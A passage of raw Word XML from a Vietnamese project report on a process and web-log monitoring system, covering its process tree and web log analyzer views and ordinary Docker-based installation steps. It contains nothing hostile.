        <w:t xml:space="preserve">chức năng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép ngừng tiến trình ngay lập tức (nếu tiến trình còn đang thực hiện)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chức năng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>web log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép xem các gói tin HTTP gần thời gian với tiến trình này (chênh lệch 10s với tiến trình được chọn).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Process Tree: chứa thông tin về cây tiến trình của một event được click, thông tin từ tiến trình cha dẫn đến tiền trình hiện tại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="1676400"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="163" name="image7.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="163" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="86" w:name="_Toc761102534"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần process tree</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Web Log Analyzer: cửa sổ riêng biệt chứa thông tin về hành vi truy cập web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="2768600"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="164" name="image12.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="164" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="2768600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="87" w:name="_Toc581655418"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần mở rộng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_heading=h.m6benovsv5vm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkStart w:id="89" w:name="_Toc924354500"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hướng dẫn cài đặt và sử dụng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tải </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>và giải nén zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chuẩn bị : Môi trường linux, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Docker &amp; Docker compose, python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy start_system.sh </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Vào thư mục nlcs sau khi giải nén</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Cấp quyền thực thi và chạy file start_system.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3448050" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3448050" cy="447675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="90" w:name="_Toc1440706563"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">: chạy script </w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>=&gt; script này sẽ hỗ trợ kiểm tra môi trường đồng thời chạy tất cả dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ngoài ra có thể chạy riêng từng dịch vụ như bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Build  docker web server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vào thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>webserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  , nơi chứa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thực hiện lệnh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>docker build -t flask-webserver .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="800100"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="165" name="image5.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="165" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="91" w:name="_Toc588875189"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build docker compose, vào thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>reverse_proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  thực hiện lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="166" name="image1.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="166" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="1143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="92" w:name="_Toc1756970612"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web server, truy cập vào địa chỉ </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhose" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1155CC"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>http://localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1155CC"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="167" name="image6.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="167" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745600" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="93" w:name="_Toc1993512491"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy hệ thống giám sát, vào thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">project </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>, chạy với quyền sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
